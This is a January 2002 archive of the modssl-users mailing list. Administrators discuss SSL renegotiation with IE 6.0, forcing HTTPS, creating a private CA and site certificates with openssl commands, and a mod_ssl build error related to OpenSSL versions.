Mon, 14 Jan 2002 10:05:01 -0800 Message-ID: From: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" To: "'modssl-users@modssl.org'" Subject: RE: Connection re-negotiation Date: Mon, 14 Jan 2002 10:04:57 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Thanks for all the feedbacks.. We did confirm that IE 6.0 has a bug and it can't upgrade a 56-bit connection to a 128-bit one.. The Netscape browser doesn't have the problem :-).. Thanks -Madhu -----Original Message----- From: Simon Ritchie [mailto:Simon.Ritchie@net.ntl.com] Sent: Monday, January 14, 2002 4:05 AM To: modssl-users@modssl.org Subject: RE: Connection re-negotiation I hit a more fundamental problem with IE. According to me, it doesn't support the keepalive messages that are needed to keep an SSL connection open, so the connection dies when the keepalive timeout kicks in - by default after one minute. This means that unless you request a new page every minute, the connection dies and your browser has to renegotiate the whole thing from scratch. If the server mandates a 128-bit connection for the next page, then the problem that you are asking about goes away. However, the cost of negotiating a new connection on every request is high. In the default configuration, Apache sets keepalive off if the browser is IE, but it appears that this just forces renegotiation on every request. Can anybody confirm that all this is correct? If so, is there a way to get around it (other than using another browser)? Simon > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of MATHIHALLI,MADHUSUDAN > (HP-Cupertino,ex1) > Sent: 08 January 2002 01:11 > To: 'modssl-users@modssl.org' > Subject: Connection re-negotiation > > > Hi mod_ssl gurus, > I had a small question regarding connection re-negotiation : > > The scenario is that I have a 56-bit browser (IE 6.0) and a 128/168 bit > enabled apache (+mod_ssl 2.8.4) server.. During a https transaction, the > browser > establishes 56-bit connection, but then inorder to access a particular > location, a 128 bit connection is mandated by the server (using the > SSLRequire option).. Is it possible that the client can upgrade the > connection to a 128-bit one ??.. If yes, how to achieve that ?.. > > -Madhu > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 14 19:13:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA16749; Mon, 14 Jan 2002 19:12:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from zeus.eal.ab.ca id TAA16733; Mon, 14 Jan 2002 19:11:55 +0100 (MET) Received: by zeus.eal.ab.ca with Internet Mail Service (5.5.2650.21) id ; Mon, 14 Jan 2002 11:12:35 -0700 Message-ID: From: "Zhang, Li" To: "'modssl-users@modssl.org'" Subject: RE: force to use SSL when accessing certain directory/url? Date: Mon, 14 Jan 2002 11:12:34 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Zhang, Li" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks guys. Looks like both "rewrite" and "set up document root for https virtual host" can do the work. I'll try "rewrite" first because it may not be good to expose a J2EE web application's root directory. Li -----Original Message----- From: Glen Mehn [mailto:glen@squaretrade.com] Sent: Monday, January 14, 2002 10:48 AM To: modssl-users@modssl.org Subject: Re: force to use SSL when accessing certain directory/url? you could also setup your ssl virtualhost with an different DocumentRoot, only available by https (port 443) and leave your https pages there. On Mon, Jan 14, 2002 at 11:52:06AM -0000, Simon Ritchie wrote: > I guess that you want to refuse access to a page by HTTP, ftp etc, so that > it can only be accessed via HTTPS. Is that correct? You can do that with > the apache rewrite mechanism. The rewrite guide shows how. > > Simon > > > > -----Original Message----- > > From: owner-modssl-users@modssl.org > > [mailto:owner-modssl-users@modssl.org]On Behalf Of Zhang, Li > > Sent: 07 January 2002 19:37 > > To: 'modssl-users@modssl.org' > > Subject: force to use SSL when accessing certain directory/url? > > > > > > Hi mod-ssl guru: > > > > It is easy to do this in IIS but for Apache/mod_ssl how can I force the > > browser to use https when a user is trying to access a url via http? I'm > > using Apache 1.3.22 + mod_ssl. > > > > For example: > > > > the user is trying to access: http://myhost/secure/index.html > > The server forces to use https://myhost/secure/index.html > > > > /secure is pointing to c:/mysecureweb > > > > I appreciate if you can give me a sample config file. > > > > Thanks. > > > > Li > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 09:17:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA02612; Tue, 15 Jan 2002 09:16:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mask.uits.indiana.edu id JAA02606; Tue, 15 Jan 2002 09:16:01 +0100 (MET) Received: from localhost (dial-123-64.dial.indiana.edu [156.56.123.64]) by mask.uits.indiana.edu (8.10.1/8.10.1/IUPO) with ESMTP id g0F8BrZ04860 for ; Tue, 15 Jan 2002 03:11:54 -0500 (EST) Date: Tue, 15 Jan 2002 03:15:28 -0500 Mime-Version: 1.0 (Apple Message framework v480) Content-Type: text/plain; charset=US-ASCII; format=flowed Subject: getting rid of Snake Oil stuff From: Joe Auty To: modssl-users@modssl.org Content-Transfer-Encoding: 7bit Message-Id: <08DF761F-0990-11D6-9A98-000A27D817F2@netmusician.org> X-Mailer: Apple Mail (2.480) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Auty X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I've been working many many hours on this problem, so I'd be EXTREMELY grateful if somebody can help me here with my handicap of limited knowledge on this subject... I've created the certificate for my site, and it works fine.. the problem is it is still signed by Snake Oil... I have gone through and created a CA for myself with instructions I found on the net, but I'm not sure what filetype this process creates which is relevant (I'm assuming .crt), if it has to be in a particular path, and what stuff to put into my httpd.conf file... My current attempt has been the following: SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key SSLCACertificatePath /etc/httpd/conf/ssl.crt/ SSLCACertificateFile /etc/httpd/conf/ssl.crt/myservername.crt As I said, if somebody would be kind enough as to spare some time with helping me, I'd be extremely grateful!! Thanks in advance! --- Joe Auty joe@netmusician.org http://www.netmusician.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 09:33:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA03198; Tue, 15 Jan 2002 09:32:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.rhsnet.com id JAA03185; Tue, 15 Jan 2002 09:31:58 +0100 (MET) Received: from w3works.com ([208.234.201.216]) by mail.rhsnet.com (Post.Office MTA v3.1.2 release (PO205-101c) ID# 9-31337L) with ESMTP id AAA226 for ; Tue, 15 Jan 2002 03:44:36 -0500 Message-ID: <3C43E8F3.13070CE4@w3works.com> Date: Tue, 15 Jan 2002 03:31:47 -0500 From: Dave Paris Organization: W3Works, LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.11 i686) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: getting rid of Snake Oil stuff References: <08DF761F-0990-11D6-9A98-000A27D817F2@netmusician.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Dave Paris X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Start your understanding by reading the following section from the mod_ssl FAQ: http://www.modssl.org/docs/2.8/ssl_faq.html#ToC24 it should all fall into place from there, particularly the part about being your own CA. best regards, -dsp Joe Auty wrote: > > Hi, > > I've been working many many hours on this problem, so I'd be EXTREMELY > grateful if somebody can help me here with my handicap of limited > knowledge on this subject... > > I've created the certificate for my site, and it works fine.. the > problem is it is still signed by Snake Oil... [...snip...] ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 09:34:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA03244; Tue, 15 Jan 2002 09:33:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA03217; Tue, 15 Jan 2002 09:32:31 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA10873 for ; Tue, 15 Jan 2002 09:32:25 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma010865; Tue, 15 Jan 02 09:32:25 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA01976 for ; Tue, 15 Jan 2002 09:32:24 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA04277 for ; Tue, 15 Jan 2002 09:32:23 +0100 (MET) Message-ID: <3C43E917.B3D4C0BB@bourse.ch> Date: Tue, 15 Jan 2002 09:32:23 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: getting rid of Snake Oil stuff References: <08DF761F-0990-11D6-9A98-000A27D817F2@netmusician.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Joe Auty wrote: > > Hi, > > I've been working many many hours on this problem, so I'd be EXTREMELY > grateful if somebody can help me here with my handicap of limited > knowledge on this subject... > > I've created the certificate for my site, and it works fine.. the > problem is it is still signed by Snake Oil... > > I have gone through and created a CA for myself with instructions I > found on the net, but I'm not sure what filetype this process creates > which is relevant (I'm assuming .crt), if it has to be in a particular > path, and what stuff to put into my httpd.conf file... My current > attempt has been the following: > > SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt > SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key > SSLCACertificatePath /etc/httpd/conf/ssl.crt/ > SSLCACertificateFile /etc/httpd/conf/ssl.crt/myservername.crt I think a few misunderstandings may have crept in... I assume you just want a certificate for your SSL site so that clients can establish a secure connection - if so, you don't need the SSLCACertificatePath or SSLCACertificateFile directives. They are for when you want to authenticate *client's* certificates (i.e. if the client needs a certificate to get into your site). All you need for a public SSL site are SSLCertificateFile and SSLCertificateKeyFile. You still need to make a CA certificate but this is for your private use to sign site certificates that you make - it never needs to be seen by the web-server. In summary, the tasks are: - Make a CA certificate (ca.crt) - make a site key (.key) - make a site certificate signing request (.csr), using the .key - sign the .csr to make a .crt These are the notes I use whenever I need to do this: 1) Create a RSA private key and certificate for our Certificate Authority # openssl genrsa -des3 -out ca.key 1024 password is "CA_PASSWORD" Now make the certificate using the private key. # openssl req -new -x509 -days 365 -key ca.key -out ca.crt 2) Now make a Certificate Signing Request for www.kiwi.com # openssl genrsa -des3 -out kiwi.key 1024 This makes the key but it is password protected, which means you have to type in a password to start the server. To avoid this, remove the PW by writing out the key to a file and overwriting it. # openssl rsa -in kiwi.key -out temp # mv temp kiwi.key Finally, make a CSR from the KEY. # openssl req -new -key kiwi.key -out kiwi.csr 4) And sign it # ./sign.sh kiwi.csr Now we have ca.crt Certificate Authority certificate ca.db.certs ) CA databases, holding ca.db.index ) details of certificates ca.db.serial ) issued ca.key Certificate Authority private key sign.sh script for signing certificates kiwi.crt www.kiwi.com certificate (sent with SSL requests) kiwi.csr KIWI certificate signing request (not really needed anymore) kiwi.key www.kiwi.com private key (decrypts public-key encoded messages) - summary of commands # openssl genrsa -des3 -out www.kiwi.com.key 1024 # openssl rsa -in www.kiwi.com.key -out temp # mv temp www.kiwi.com.key # openssl req -new -key www.kiwi.com.key -out www.kiwi.com.csr # ./sign.sh www.kiwi.com.csr Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 14:27:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA18742; Tue, 15 Jan 2002 14:26:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from lv.raad.tartu.ee id OAA18737; Tue, 15 Jan 2002 14:25:53 +0100 (MET) Received: Message by Barricade lv.raad.tartu.ee with ESMTP id g0FDPoD28425 for ; Tue, 15 Jan 2002 15:25:50 +0200 Message-Id: <200201151325.g0FDPoD28425@lv.raad.tartu.ee> Received: from INFO/SpoolDir by raad.tartu.ee (Mercury 1.48); 15 Jan 02 15:25:32 +0200 Received: from SpoolDir by INFO (Mercury 1.48); 15 Jan 02 15:25:06 +0200 From: "Toomas Aas" Organization: Tartu City Government To: modssl-users@modssl.org Date: Tue, 15 Jan 2002 15:24:57 +0200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Problem building Apache 1.3.22 + mod_ssl 2.8.5 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Toomas Aas" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello! I have a site which is currently running Apache 1.3.20 + PHP 4.0.6 + mod_ssl 2.8.4 on FreeBSD 4.3. Both mod_php4 and mod_ssl are statically built into Apache. I'm trying to upgrade to Apache 1.3.22 + PHP 4.1.1 + mod_php 2.8.5 but can't figure out a problem which seems to exist between Apache and mod_ssl. I follow these steps: # setenv EAPI_MM SYSTEM # setenv SSL_BASE SYSTEM # cd mod_ssl-2.8.5-1.3.22 # ./configure --with-apache=../apache_1.3.22 \ --with-crt=/usr/local/etc/httpd/ssl.crt/server.crt \ --with-key=/usr/l ocal/etc/httpd/ssl.key/server .key # cd ../apache_1.3.22 # ./configure --with-layout=GNU --enable-module=ssl # make gcc -c -I/usr/local/include -I../os/unix -I../include -funsigned-char -DMOD_SS L=208105 -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite -DNO_DL_NEEDED `../apaci` http_core.c http_core.c: In function `set_accept_mutex': http_core.c:1140: warning: return makes pointer from integer without a cast http_core.c: In function `set_acceptfilter': http_core.c:2538: `ap_acceptfilter' undeclared (first use in this function) http_core.c:2538: (Each undeclared identifier is reported only once http_core.c:2538: for each function it appears in.) *** Error code 1 Stop in /mirror01/usr/src/local/apache_1.3.22/src/main. *** Error code 1 Stop in /mirror01/usr/src/local/apache_1.3.22/src. *** Error code 1 Stop in /mirror01/usr/src/local/apache_1.3.22. *** Error code 1 Stop in /mirror01/usr/src/local/apache_1.3.22. ------------ the unhappy end of compile ------------------------ This procedure worked on the same machine with Apache 1.3.20 + mod_ssl 2.8.4 but now for whatever reason it doesn't. I can successfully build Apache alone or Apache with statically compiled mod_php4, but as soon as I try to add mod_ssl 2.8.5, the above error appears. How can I fix this situation? -- Toomas Aas | toomas.aas@raad.tartu.ee | http://www.raad.tartu.ee/~toomas/ * Life would be easier if I had the source code. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 14:41:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA19460; Tue, 15 Jan 2002 14:40:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id OAA19393; Tue, 15 Jan 2002 14:39:04 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g0FDcgr16849 for ; Tue, 15 Jan 2002 13:38:47 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Tue, 15 Jan 2002 13:40:50 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F01886D00@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: Problem building Apache 1.3.22 + mod_ssl 2.8.5 Date: Tue, 15 Jan 2002 13:41:01 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users What version of openssl do you have? Are you aware that you have spaces in your configure section below, or is that just the pasting process going wrong? Apache 1.3.22 should compile with openssl 0.9.6b or 0.9.6c. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Agnostic (Greek) = Ignoramus (Latin) >-----Original Message----- >From: Toomas Aas [mailto:toomas.aas@raad.tartu.ee] >Sent: 15 January 2002 13:25 >To: modssl-users@modssl.org >Subject: Problem building Apache 1.3.22 + mod_ssl 2.8.5 > > >Hello! > >I have a site which is currently running Apache 1.3.20 + PHP 4.0.6 >+ mod_ssl 2.8.4 on FreeBSD 4.3. Both mod_php4 and mod_ssl are >statically built into Apache. > >I'm trying to upgrade to Apache 1.3.22 + PHP 4.1.1 + mod_php 2.8.5 >but can't figure out a problem which seems to exist between Apache >and mod_ssl. > >I follow these steps: > ># setenv EAPI_MM SYSTEM ># setenv SSL_BASE SYSTEM ># cd mod_ssl-2.8.5-1.3.22 ># ./configure --with-apache=../apache_1.3.22 \ > --with-crt=/usr/local/etc/httpd/ssl.crt/server.crt \ > --with-key=/usr/l ocal/etc/httpd/ssl.key/server .key ># cd ../apache_1.3.22 ># ./configure --with-layout=GNU --enable-module=ssl ># make > > > >gcc -c -I/usr/local/include -I../os/unix -I../include >-funsigned-char -DMOD_SS L=208105 -DEAPI -DEAPI_MM -DUSE_EXPAT >-I../lib/expat-lite -DNO_DL_NEEDED `../apaci` http_core.c >http_core.c: In function `set_accept_mutex': http_core.c:1140: >warning: return makes pointer from integer without a cast >http_core.c: In function `set_acceptfilter': http_core.c:2538: >`ap_acceptfilter' undeclared (first use in this function) >http_core.c:2538: (Each undeclared identifier is reported only once >http_core.c:2538: for each function it appears in.) > >*** Error code 1 > >Stop in /mirror01/usr/src/local/apache_1.3.22/src/main. >*** Error code 1 > >Stop in /mirror01/usr/src/local/apache_1.3.22/src. >*** Error code 1 > >Stop in /mirror01/usr/src/local/apache_1.3.22. >*** Error code 1 > >Stop in /mirror01/usr/src/local/apache_1.3.22. > >------------ the unhappy end of compile ------------------------ > >This procedure worked on the same machine with Apache 1.3.20 + >mod_ssl 2.8.4 but now for whatever reason it doesn't. > >I can successfully build Apache alone or Apache with statically >compiled mod_php4, but as soon as I try to add mod_ssl 2.8.5, the >above error appears. > >How can I fix this situation? >-- >Toomas Aas | toomas.aas@raad.tartu.ee | http://www.raad.tartu.ee/~toomas/ * Life would be easier if I had the source code. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 15:06:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA20838; Tue, 15 Jan 2002 15:05:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from lv.raad.tartu.ee id PAA20659; Tue, 15 Jan 2002 15:04:30 +0100 (MET) Received: Message by Barricade lv.raad.tartu.ee with ESMTP id g0FDorX28905; Tue, 15 Jan 2002 15:50:53 +0200 Message-Id: <200201151350.g0FDorX28905@lv.raad.tartu.ee> Received: from INFO/SpoolDir by raad.tartu.ee (Mercury 1.48); 15 Jan 02 15:50:35 +0200 Received: from SpoolDir by INFO (Mercury 1.48); 15 Jan 02 15:50:25 +0200 From: "Toomas Aas" Organization: Tartu City Government To: John.Airey@rnib.org.uk, modssl-users@modssl.org Date: Tue, 15 Jan 2002 15:50:19 +0200 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: RE: Problem building Apache 1.3.22 + mod_ssl 2.8.5 In-reply-to: <9B66BBD37D5DD411B8CE00508B69700F01886D00@pborolocal.rnib.org.uk> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Toomas Aas" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi John.Airey@rnib.org.uk! Thanks for replying so soon. On 15 Jan 02 at 13:41 you wrote: > What version of openssl do you have? Are you aware that you have spaces in > your configure section below, or is that just the pasting process going > wrong? > > Apache 1.3.22 should compile with openssl 0.9.6b or 0.9.6c. That might be my problem right here, then. I use OpenSSL version which is included in the base system of FreeBSD 4.3-RELEASE. The version is 0.9.6: $ openssl version OpenSSL 0.9.6 24 Sep 2000 Can anyone confirm that mod_ssl 2.8.5 doesn't work with this version of OpenSSL? BTW, the spaces *were* caused by my mailer as I pasted the text. -- Toomas Aas | toomas.aas@raad.tartu.ee | http://www.raad.tartu.ee/~toomas/ * Nostalgia isn't what it used to be... ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 15:23:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA21553; Tue, 15 Jan 2002 15:22:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id PAA21521; Tue, 15 Jan 2002 15:21:39 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g0FELIr19212 for ; Tue, 15 Jan 2002 14:21:23 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Tue, 15 Jan 2002 14:23:26 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F01886D02@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: Problem building Apache 1.3.22 + mod_ssl 2.8.5 Date: Tue, 15 Jan 2002 14:23:32 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users >-----Original Message----- >From: Toomas Aas [mailto:toomas.aas@raad.tartu.ee] >Sent: 15 January 2002 13:50 >To: John.Airey@rnib.org.uk; modssl-users@modssl.org >Subject: RE: Problem building Apache 1.3.22 + mod_ssl 2.8.5 > > >Hi John.Airey@rnib.org.uk! > >Thanks for replying so soon. > > >That might be my problem right here, then. I use OpenSSL >version which is included in the base system of FreeBSD >4.3-RELEASE. The version is 0.9.6: > >$ openssl version >OpenSSL 0.9.6 24 Sep 2000 > >Can anyone confirm that mod_ssl 2.8.5 doesn't work with this >version of OpenSSL? > There's a README.Versions file with the mod_ssl package, but this is all it has at the end of it: 23-Jan-2001 2.8.0 1.3.17 0.9.3-0.9.6 03-Mar-2001 2.8.1 1.3.19 0.9.3-0.9.6 30-Mar-2001 2.8.2 1.3.19 0.9.3-0.9.6 04-May-2001 2.8.3 1.3.19 0.9.3-0.9.6a 20-May-2001 2.8.4 1.3.20 0.9.3-0.9.6a (The figures are the release dates, mod_ssl, Apache and openssl versions). 2.8.5 was released on 16th October, and openssl 0.9.6c was released on 21st December, hence my statement that it should work with 0.9.6b or 0.9.6c. Unless Ralf can say otherwise, it looks like 2.8.5 should build with 0.9.6. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Agnostic (Greek) = Ignoramus (Latin) - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 15:35:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA22162; Tue, 15 Jan 2002 15:34:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id PAA22115; Tue, 15 Jan 2002 15:33:22 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 10CB6BD2A; Tue, 15 Jan 2002 15:34:43 +0100 (CET) Date: Tue, 15 Jan 2002 15:34:43 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Problem building Apache 1.3.22 + mod_ssl 2.8.5 Message-ID: <20020115143443.GF17349@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <9B66BBD37D5DD411B8CE00508B69700F01886D02@pborolocal.rnib.org.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F01886D02@pborolocal.rnib.org.uk> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Jan 15, 2002 at 02:23:32PM -0000, John.Airey@rnib.org.uk wrote: > There's a README.Versions file with the mod_ssl package, but this is all it > has at the end of it: > > 23-Jan-2001 2.8.0 1.3.17 0.9.3-0.9.6 > 03-Mar-2001 2.8.1 1.3.19 0.9.3-0.9.6 > 30-Mar-2001 2.8.2 1.3.19 0.9.3-0.9.6 > 04-May-2001 2.8.3 1.3.19 0.9.3-0.9.6a > 20-May-2001 2.8.4 1.3.20 0.9.3-0.9.6a > > (The figures are the release dates, mod_ssl, Apache and openssl versions). > > 2.8.5 was released on 16th October, and openssl 0.9.6c was released on 21st > December, hence my statement that it should work with 0.9.6b or 0.9.6c. > > Unless Ralf can say otherwise, it looks like 2.8.5 should build with 0.9.6. > I should think so too (I think that I have seen somebody use those versions). At least recent changes in mod_ssl has been minimal and just following the changes in apache. There are two things to note: 1. openssl should be upgraded to at least 0.9.6b for security reasons 2. compiling and configuring a seperate openssl specifically for use with mod_ssl using the config option no-thread will improve the performance of mod_ssl vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 15 19:32:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for 